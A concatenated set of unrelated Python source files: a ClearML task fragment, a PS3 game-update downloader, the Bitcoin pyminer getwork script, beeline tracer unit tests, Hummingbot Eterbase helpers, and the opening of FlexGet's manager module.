log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Optional[Union[str, Task]]) -> None
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_pid, _, master_task_id = PROC_MASTER_ID_ENV_VAR.get('').partition(':')
# we could not find a task ID, revert to old stub behaviour
if not master_task_id:
return None
return master_task_id
@classmethod
def __get_master_process_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[0]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> None
"""
Set offline mode, where all data and logs are stored into local folder, for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return offline-mode state, If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
RPCS3 Game Update Downloader.py
|
## This code is trash and will make your eyes bleed. You have been warned.
## This program requires you to install PyYAML and aiohttp (python -m pip pyyaml aiohttp[speedups])
## This program also requires Python 3.8 or higher due to using the walrus operator
import yaml
import asyncio
import aiohttp
import threading
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from xml.etree import ElementTree
from typing import Callable
## CONSTANTS
# Declare a constant for 1MiB, which is 2^20
ONE_MEBIBYTE = 2**20
## FUNCTIONS
# async_op takes in an async function and a list of arguments for said function. It then creates an Event Loop and runs the async function in a thread using said loop.
def async_op(func: Callable[[], None], args: list = []):
loop = asyncio.new_event_loop()
# We need to pass in the given args in addition to the actual loop, so we unpack the args list in a new tuple along with the loop.
threading.Thread(target=func, args=(*args, loop,)).start()
# async_download_handler takes in a URL string, a string for the save path, an integer for the size of the file in bytes, a tkinter Button, and an asyncio Event Loop.
# It then runs the async function download_update in the given Event Loop until it completes, then terminates the loop.
def async_download_handler(url: str, save_path: str, size:int, button: tk.Button, loop: asyncio.AbstractEventLoop):
button.configure(text="Downloading...")
loop.run_until_complete(download_update(url, save_path, size, button))
loop.close()
# async_query_handler takes in an asyncio Event Loop. It then runs the async function load_game_info in the given Event loop until it completes, then terminates the loop.
def async_query_handler(loop: asyncio.AbstractEventLoop):
loop.run_until_complete(load_game_info())
loop.close()
# download_update is an async function that takes in a URL string, a string for the save path, an integer for the size of the file in bytes, and a tkinter Button.
# It then downloads the file specified by the URL to the specified save path and shows the progress of the download in a popup window.
async def download_update(url: str, save_path: str, size: int, button: tk.Button):
# Splitting the given URL by the '/' character and taking the last string in the resulting array gives the name of the file on the server.
# E.g., "playstation.com/files/example.pkg".split('/')[-1] results in the string "example.pkg".
file_name = url.split('/')[-1]
file_path = f"{save_path}/{file_name}"
# Create a tkinter Toplevel window and give it a (kind of) descriptive title.
downloading_window = tk.Toplevel()
downloading_window.title("Downloader")
# Create a tkinter Label, place it in downloading_window, and set the Label's text to inform the user that it's downloading the specified file.
downloading_label = tk.Label(downloading_window, text=f"Downloading {file_name}...")
downloading_label.pack()
# Create a tkinter Progressbar, place it in downloading_window, and set the bar to be 100% full when the bar's amount is equal to the size of the specified file in bytes.
downloading_progress_bar = ttk.Progressbar(downloading_window, mode="determinate", length=300, maximum=size)
downloading_progress_bar.pack()
# N.B.: As far as I know, the documentation for aiohttp discourages creating multiple ClientSessions in one project, preferring that users simply reuse one session throughout.
# I don't do this, and I personally haven't had any issues in doing this, but I wanted to state this in case someone wanted to use this as an example of using aiohttp.
# While I personally have had zero issues, you technically shouldn't do this as it's not best practice for this library.
# Granted, you probably shouldn't be using this dumpster fire as an example of anything other than bad code.
# Open an aiohttp ClientSession as session and:
async with aiohttp.ClientSession() as session:
# Get the contents of the given URL as resp and:
async with session.get(url) as resp:
# Create the file at file_path if it doesn't exist and open it as writeable binary with the name file and:
with open(file_path, 'wb') as file:
# While chunk is assigned to a truthy value:
while (chunk := await resp.content.read(ONE_MEBIBYTE)):
# Write the current chunk to file.
file.write(chunk)
# Increment the progress bar by the length of the current chunk (usually 1MiB unless near the end of file)
downloading_progress_bar.step(amount=len(chunk))
# Change the text of the tkinter Button and set its state to disabled
button.configure(text="Downloaded!", state=tk.DISABLED)
# Destroy the downloading window.
downloading_window.destroy()
# load_game_info is an async function that takes in no arguments. It then retrieves any available updates for the titles specified in the "games.yml" file and shows the user a list of all available updates along with the option to download said updates.
async def load_game_info():
# Tkinter doesn't have an easy way to make a scrollable frame and I didn't want to add another dependency for something so trivial.
# After a bit of googling, I found an article by Jose Salvatierra (https://blog.tecladocode.com/tkinter-scrollable-frames/) that accomplishes exactly what I need.
# Create a Tkinter frame that will act as a container for our canvas and scrollbar (hence the name 'container')
container = tk.Frame(main_frame)
# Create a Tkinter canvas that will contain the frame we want to be scrollable. While Tkinter frames cannot be scrollable, Tkinter canvases can.
canvas = tk.Canvas(container)
# Create a Tkinter scrollbar to scroll our canvas.
scrollbar = tk.Scrollbar(container, command=canvas.yview)
# Finally, create the Tkinter frame we want to be scrollable.
header = tk.Frame(canvas)
# Open an aiohttp ClientSession as session and:
async with aiohttp.ClientSession() as session:
# For each game in the games.yml file:
for game in game_ids:
# We need to specify no SSL because the PS3 update server uses a self-signed certificate.
# I'm sure an actual PS3 has no issue with that, but aiohttp (and any remotely modern web browser) definitely does.
# Get the contents of the specified URL as response and:
async with session.get(f"https://a0.ww.np.dl.playstation.net/tpl/np/{game}/{game}-ver.xml", ssl=False) as response:
# Check the text of the response.
# This is important because a game with no updates will sometimes return a 200 code with zero text, while other games with no updates return a 404 error code.
content = await response.text()
# Inform the user no content was found for the specified game if the page 404s or has no content.
if response.status == 404 or content == "":
print(f"Nothing found for {game}!")
else:
# Convert the XML into a manipulable data structure using ElementTree
base = ElementTree.fromstring(content)
# Set updates to the list of updates
updates = base[0]
# Set updates_list to an empty list
updates_list = []
# For each update:
for update in updates:
# Add the current game to updates_list
updates_list.append(update.attrib)
try:
# Set the title of the game. This will only work for the last listed update for a given title. All other updates for a given title will throw an IndexError because the TITLE attribute will not exist.
title = update[0][0].text
# Inform the user a new title was found.
print(f"New title: {title}")
# Add the title to updates_dict
updates_dict[title] = updates_list
except IndexError:
# Inform the user that an IndexError was thrown and why it was thrown.
print("IndexError thrown! No TITLE tag found, ignoring...")
# Set updates_list back to an empty list
# There is likely a much neater way to do this, but I'm bad at coding.
updates_list = []
# For a given title and its updates in updates_dict:
for (title, updates) in updates_dict.items():
# Create a Tkinter LabelFrame, set its parent to header, and set its title to the title of the current game.
current_game = tk.LabelFrame(header, text=title)
current_game.pack()
# For each update for a given game:
for update in updates:
# Create a Tkinter Label and set its text to show the version of the update file.
game_version = tk.Label(current_game, text=f"Version: {update['version']}")
game_version.pack()
# Create a Tkinter Label and set its text to show the size of the update file in MiB rounded to 1 decimal place.
game_size = tk.Label(current_game, text=f"Update Size: {round(int(update['size']) / ONE_MEBIBYTE, 1)} MiB")
game_size.pack()
# Create a Tkinter Label and set its text to show the SHA1 Checksum of the update file.
game_sha1_sum = tk.Label(current_game, text=f"SHA1 Checksum: {update['sha1sum']}")
game_sha1_sum.pack()
# Create a Tkinter Label and set its text to show the PS3 firmware version required by the update.
game_system_version = tk.Label(current_game, text="Required Firmware: Version %.2f" % float(update['ps3_system_ver']))
game_system_version.pack()
# Create a Tkinter Button that will download the update to the previously specified save path on click.
game_download = tk.Button(current_game, text="Download Update")
# Set the Button's command to download the specified game update using the async_download_handler function.
# The reason this looks like such a mess is because:
# 1. I am bad at coding.
# 2. Since Tkinter doesn't neatly support multi-threaded tasks, the download bar would not show any progress unless I specifically create a new asyncio Event Loop to run the download task asynchronously.
game_download.config(command=lambda url=update['url'], button=game_download, size=int(update['size']): async_op(async_download_handler, [url, save_path, size, button]))
game_download.pack()
# Make the loading bar and label invisible since they are no longer needed.
loading_bar.pack_forget()
loading_label.pack_forget()
# Change the size of canvas whenever header changes size (i.e. whenever we add a widget).
header.bind("<Configure>", lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
# Draw header starting at the top-left corner of canvas.
canvas.create_window((0, 0), window=header, anchor=tk.NW)
# Allow the scrollbar to actually scroll the canvas.
canvas.configure(yscrollcommand=scrollbar.set)
# Allow the user to scroll the list using their mouse's scroll wheel.
canvas.bind_all("<MouseWheel>", lambda e: canvas.yview_scroll(int(-e.delta/120), "units"))
canvas.bind("<Configure>", lambda e: canvas.scale("all", 0, 0, e.width, e.height))
# Set the container, canvas, and scrollbar to be visible.
container.pack(fill=tk.BOTH, expand=True)
canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
# Initialize tkinter and set the window title.
root = tk.Tk()
root.title("PS3 Game Update Downloader")
# Create a Tkinter Frame to act as our primary frame for all widgets.
main_frame = tk.Frame(root)
main_frame.pack(fill=tk.BOTH, expand=True)
# Create a Tkinter Label to fill space while the program is retrieving updates.
loading_label = tk.Label(main_frame, text="Loading...")
loading_label.pack()
# Create an indeterminate Tkinter Progressbar to show the user that the program is retrieving updates and not frozen.
loading_bar = ttk.Progressbar(main_frame, mode="indeterminate", length=300)
loading_bar.start()
loading_bar.pack()
# Prompt the user to find their RPCS3 'games.yml' file.
file_path = filedialog.askopenfilename(title="Open Your RPCS3 'games.yml' File", filetypes=(("RPCS3 'games.yml' File", "games.yml"),))
# Prompt the user to select a folder to save their PS3 game updates in.
save_path = filedialog.askdirectory(title="Select a folder to save updates in")
# Load 'games.yml' at the specified path using PyYAML's safe_load function.
games = yaml.safe_load(open(file_path))
# Set game_ids to a list of the game IDs present in 'games.yml'
game_ids = list(games.keys())
# Set updates_dict to an empty dictionary
updates_dict = {}
# Asynchronously retrieve the PS3 game updates.
# As before, we need to do this because Tkinter likes to do things synchronously, which causes our loading bar to freeze.
async_op(async_query_handler)
root.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 46333
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_beeline.py
|
import threading
import unittest
from mock import Mock, patch, call
import beeline
import libhoney
assert libhoney
class TestBeeline(unittest.TestCase):
def setUp(self):
self.addCleanup(patch.stopall)
self.m_gbl = patch('beeline._GBL').start()
def test_send_event(self):
''' test correct behavior for send_event '''
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
m_span = Mock()
_beeline.tracer_impl.get_active_span.return_value = m_span
_beeline.send_event()
_beeline.tracer_impl.get_active_span.assert_called_once_with()
_beeline.tracer_impl.finish_trace.assert_called_once_with(m_span)
def test_send_no_events(self):
''' ensure nothing crashes when we try to send with no events in the
stack '''
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
_beeline.tracer_impl.get_active_span.return_value = None
_beeline.send_event()
_beeline.tracer_impl.get_active_span.assert_called_once_with()
def test_send_all(self):
''' ensure events are flushed, and that the root span is handled with
finish_trace '''
s1, s2, s3 = Mock(), Mock(), Mock()
s1.is_root.return_value = False
s2.is_root.return_value = False
s3.is_root.return_value = True
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
_beeline.tracer_impl.get_active_span.side_effect = [s1, s2, s3, None]
_beeline.send_all()
_beeline.tracer_impl.finish_span.assert_has_calls([
call(s1),
call(s2),
])
_beeline.tracer_impl.finish_trace.assert_called_once_with(s3)
def test_run_hooks_and_send_no_hooks(self):
''' ensure send works when no hooks defined '''
ev = Mock()
_beeline = beeline.Beeline()
_beeline.tracer_impl = Mock()
_beeline._run_hooks_and_send(ev)
# no hooks, not a traced event - call send
ev.send.assert_called_once_with()
ev.send_presampled.assert_not_called()
def test_run_hooks_and_send_sampler(self):
''' ensure send works with a sampler hook defined '''
def _sampler_drop_all(fields):
return False, 0
m_sampler_hook = Mock()
m_sampler_hook.side_effect = _sampler_drop_all
_beeline = beeline.Beeline(sampler_hook=m_sampler_hook)
_beeline.tracer_impl = Mock()
ev = Mock()
_beeline._run_hooks_and_send(ev)
m_sampler_hook.assert_called_once_with(ev.fields())
ev.send_presampled.assert_not_called()
ev.send.assert_not_called()
def _sampler_drop_none(fields):
return True, 100
ev = Mock()
m_sampler_hook.reset_mock()
m_sampler_hook.side_effect = _sampler_drop_none
_beeline._run_hooks_and_send(ev)
m_sampler_hook.assert_called_once_with(ev.fields())
self.assertEqual(ev.sample_rate, 100)
ev.send_presampled.assert_called_once_with()
ev.send.assert_not_called()
def test_run_hooks_and_send_presend_hook(self):
''' ensure send works when presend hook is defined '''
def _presend_hook(fields):
fields["thing i want"] = "put it there"
del fields["thing i don't want"]
m_presend_hook = Mock()
m_presend_hook.side_effect = _presend_hook
_beeline = beeline.Beeline(presend_hook=m_presend_hook)
_beeline.tracer_impl = Mock()
ev = Mock()
ev.fields.return_value = {
"thing i don't want": "get it out of here",
"happy data": "so happy",
}
_beeline._run_hooks_and_send(ev)
ev.send_presampled.assert_not_called()
ev.send.assert_called_once_with()
self.assertDictEqual(
ev.fields(),
{
"thing i want": "put it there",
"happy data": "so happy",
},
)
def test_start_trace_returns_value(self):
''' ensure the top-level start_span and start_trace APIs return the value
form their calls to the tracer '''
self.m_gbl.tracer_impl.start_span.return_value = 'wooimaspan'
val = beeline.start_span()
self.assertEqual(val, 'wooimaspan')
self.m_gbl.tracer_impl.start_trace.return_value = 'wooimatrace'
val = beeline.start_trace()
self.assertEqual(val, 'wooimatrace')
def test_marshal_trace_context_returns_value(self):
''' ensure the top-level definition of marshal_trace_context returns a value '''
self.m_gbl.tracer_impl.marshal_trace_context.return_value = 'asdf'
val = beeline.marshal_trace_context()
self.assertEqual(val, 'asdf')
def test_trace_wrapper(self):
''' ensure that the trace wrapper decorates a function and starts a trace '''
_beeline = beeline.Beeline()
with patch('beeline.get_beeline') as m_gbl:
m_gbl.return_value = _beeline
_beeline.tracer_impl._run_hooks_and_send = Mock()
@beeline.traced(name="my_sum")
def my_sum(a, b):
return a + b
# this should accept the function's arguments normally and return the function's value
# if there is one
self.assertEqual(my_sum(1, 2), 3)
# check that an event was sent, from which we can infer that the function was wrapped
self.assertTrue(_beeline.tracer_impl._run_hooks_and_send.called)
def test_treaded_trace(self):
_beeline = beeline.Beeline()
with patch('beeline.get_beeline') as m_gbl:
m_gbl.return_value = _beeline
_beeline.tracer_impl._run_hooks_and_send = Mock()
_beeline.tracer_impl.start_trace(trace_id="asdf")
self.assertEqual(_beeline.tracer_impl._state.trace_id, "asdf")
def thread_func():
# confirm no trace state in new thread
self.assertFalse(hasattr(_beeline.tracer_impl._state, 'trace_id'))
t = threading.Thread(target=thread_func)
t.start()
t.join()
@beeline.traced_thread
def traced_thread_func():
self.assertEqual(_beeline.tracer_impl._state.trace_id, "asdf")
with _beeline.tracer(name="foo") as span:
self.assertEqual(span.trace_id, "asdf")
self.assertEqual(span.parent_id, _beeline.tracer_impl._state.stack[0].id)
t = threading.Thread(target=traced_thread_func)
t.start()
t.join()
# test use of beeline client
@_beeline.traced_thread
def traced_thread_func_2():
self.assertEqual(_beeline.tracer_impl._state.trace_id, "asdf")
with _beeline.tracer(name="foo2") as span:
self.assertEqual(span.trace_id, "asdf")
self.assertEqual(span.parent_id, _beeline.tracer_impl._state.stack[0].id)
t = threading.Thread(target=traced_thread_func_2)
t.start()
t.join()
def test_finish_span_none(self):
''' ensure finish_span does not crash if an empty span is passed to it '''
_beeline = beeline.Beeline()
# should not crash
_beeline.tracer_impl.finish_span(None)
class TestBeelineNotInitialized(unittest.TestCase):
def setUp(self):
self.addCleanup(patch.stopall)
self.m_gbl = patch('beeline.get_beeline').start()
self.m_gbl.return_value = None
def test_trace_wrapper(self):
''' ensure the trace wrapper doesn't break if the beeline is not initialized '''
self.assertIsNone(beeline.get_beeline())
@beeline.traced(name="my_sum")
def my_sum(a, b):
return a + b
# this should not crash if the beeline isn't initialized
# it should also accept arguments normally and return the function's value
self.assertEqual(my_sum(1, 2), 3)
def test_tracer_context_manager(self):
''' ensure the tracer context manager doesn't break if the beeline is not initialized '''
self.assertIsNone(beeline.get_beeline())
def my_sum(a, b):
with beeline.tracer(name="my_sum"):
return a + b
# this should not crash if the beeline isn't initialized
# it should also accept arguments normally and return the function's value
self.assertEqual(my_sum(1, 2), 3)
def test_traced_thread(self):
self.assertIsNone(beeline.get_beeline())
@beeline.traced_thread
def my_sum(a, b):
return a + b
# this should not crash if the beeline isn't initialized
# it should also accept arguments normally and return the function's value
self.assertEqual(my_sum(1, 2), 3)
|
eterbase_utils.py
|
import logging
from typing import Dict, Any, Optional, Tuple, List
import hummingbot.connector.exchange.eterbase.eterbase_constants as constants
from hummingbot.connector.exchange.eterbase.eterbase_auth import EterbaseAuth
import aiohttp
import asyncio
import json
from threading import Thread
_eu_logger = logging.getLogger(__name__)
shared_client = None
marketid_map = None
API_CALL_TIMEOUT = 10.0
async def _http_client(loop: Optional = None) -> aiohttp.ClientSession:
"""
:returns: Shared client session instance
"""
# calling API from different thread
if loop is not None:
return aiohttp.ClientSession(loop = loop)
# calling API fro main thread
global shared_client
if shared_client is None:
shared_client = aiohttp.ClientSession()
return shared_client
async def api_request(http_method: str,
path_url: str = None,
url: str = None,
data: Optional[Dict[str, Any]] = None,
auth: Optional[EterbaseAuth] = None,
loop: Optional = None) -> Dict[str, Any]:
"""
A wrapper for submitting API requests to Eterbase
:returns: json data from the endpoints
"""
assert path_url is not None or url is not None
url = f"{constants.REST_URL}{path_url}" if url is None else url
data_str = None
if data is not None:
data_str = json.dumps(data)
_eu_logger.debug(f"Request: url: {url}")
_eu_logger.debug(f"Request: data: {data_str}")
headers = {}
if auth is not None:
headers = auth.get_headers(http_method, url, data_str)
if data is not None:
headers['Content-Type'] = "application/json"
client = await _http_client(loop)
async with client.request(http_method,
url=url,
timeout=API_CALL_TIMEOUT,
data=data_str,
headers=headers) as response:
data = None
data = await response.text()
_eu_logger.debug(f"Response text data: '{data}'."[:400])
if len(data) > 0:
try:
data = json.loads(data)
except ValueError:
_eu_logger.info(f"Response is not a json text: '{data}'."[:400])
if (response.status != 200) and (response.status != 204):
raise IOError(f"Error fetching data from {url}. HTTP status is {response.status}. {data}", response.status)
return data
def start_background_loop(loop: asyncio.AbstractEventLoop) -> None:
loop.run_forever()
def get_marketid_mapping() -> Dict[int, str]:
global marketid_map
if (marketid_map is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
marketid_map = dict()
for market in markets:
marketid = market.get("id")
if marketid not in marketid_map.keys():
trad_pair = market.get("symbol")
marketid_map[marketid] = trad_pair
return marketid_map
trading_pairs_split = None
def prepare_trading_pairs_split(markets: List):
global trading_pairs_split
if trading_pairs_split is None:
trading_pairs_split = dict()
for market in markets:
trad_pair = market.get("symbol")
if trad_pair not in trading_pairs_split:
base = market.get("base")
quote = market.get("quote")
trading_pairs_split[trad_pair] = {"base": base, "quote": quote}
def split_trading_pair(trading_pair: str) -> Tuple[str, str]:
global trading_pairs_split
if (trading_pairs_split is None):
loop = asyncio.new_event_loop()
t = Thread(target=start_background_loop, args=(loop, ), daemon=True)
t.start()
future = asyncio.run_coroutine_threadsafe(api_request("get", path_url="/markets", loop=loop), loop)
markets = future.result(constants.API_TIMEOUT_SEC)
loop.stop()
prepare_trading_pairs_split(markets)
try:
market = trading_pairs_split[trading_pair]
base_asset = market['base']
quote_asset = market['quote']
return base_asset, quote_asset
except Exception:
raise ValueError(f"Error parsing trading_pair {trading_pair}", exc_info=True)
def convert_to_exchange_trading_pair(hb_trading_pair: str) -> str:
return hb_trading_pair.replace("-", "")
def convert_from_exchange_trading_pair(trading_pair: str) -> str:
base, quote = split_trading_pair(trading_pair)
return f"{base}-{quote}"
|
manager.py
|
import argparse # noqa
import atexit # noqa
import codecs # noqa
import copy # noqa
import errno # noqa
import fnmatch # noqa
import hashlib # noqa
import io # noqa
import os # noqa
import shutil # noqa
import signal # noqa
import sys # noqa
import threading # noqa
import traceback # noqa
from contextlib import contextmanager # noqa
from datetime import datetime, timedelta # noqa
from typing import Iterator, List, Optional, Sequence, Tuple, Type, Union # noqa
import sqlalchemy # noqa
import yaml # noqa
from loguru import logger # noqa
from sqlalchemy.exc import OperationalError # noqa
from sqlalchemy.ext.declarative import declarative_base # noqa
from sqlalchemy.orm import sessionmaker # noqa
# These need to be declared before we start importing from other flexget modules, since they might import them
from flexget.utils.sqlalchemy_utils import ContextSession # noqa
from flexget.utils.tools import get_current_flexget_version, io_encoding, pid_exists # noqa
Base = declarative_base()
Session: Type[ContextSession] = sessionmaker(class_=ContextSession)
import flexget.log # noqa
from flexget import config_schema, db_schema, plugin # noqa
from flexget.event import fire_event # noqa
from flexget.ipc import IPCClient, IPCServer # noqa
from flexget.options import ( # noqa
CoreArgumentParser,
ParserError,
get_parser,
manager_parser,
unicode_argv,
)
from flexget.task import Task # noqa
from flexget.task_queue import TaskQueue # noqa
from flexget.terminal import console, get_console_output # noqa
logger = logger.bind(name='manager')
manager = None
DB_CLEANUP_INTERVAL = timedelta(days=7)
class Manager:
"""Manager class for FlexGet
Fires events:
* manager.initialize
The first time the manager is initialized, before config is loaded
* manager.before_config_load
Before the config file is loaded from disk
* manager.before_config_validate
When updating the config, before the validator is run on it
* manager.config_updated
After a configuration file has been loaded or changed (and validated) this event is fired
* manager.startup
After manager has been initialized. This is when application becomes ready to use,
however no database lock is present, so the database must not be modified on this event.
* manager.lock_acquired
The manager does not always require a lock on startup, if one is requested,
this event will run when it has been acquired successfully
* manager.upgrade
If any plugins have declared a newer schema version than exists in the database,
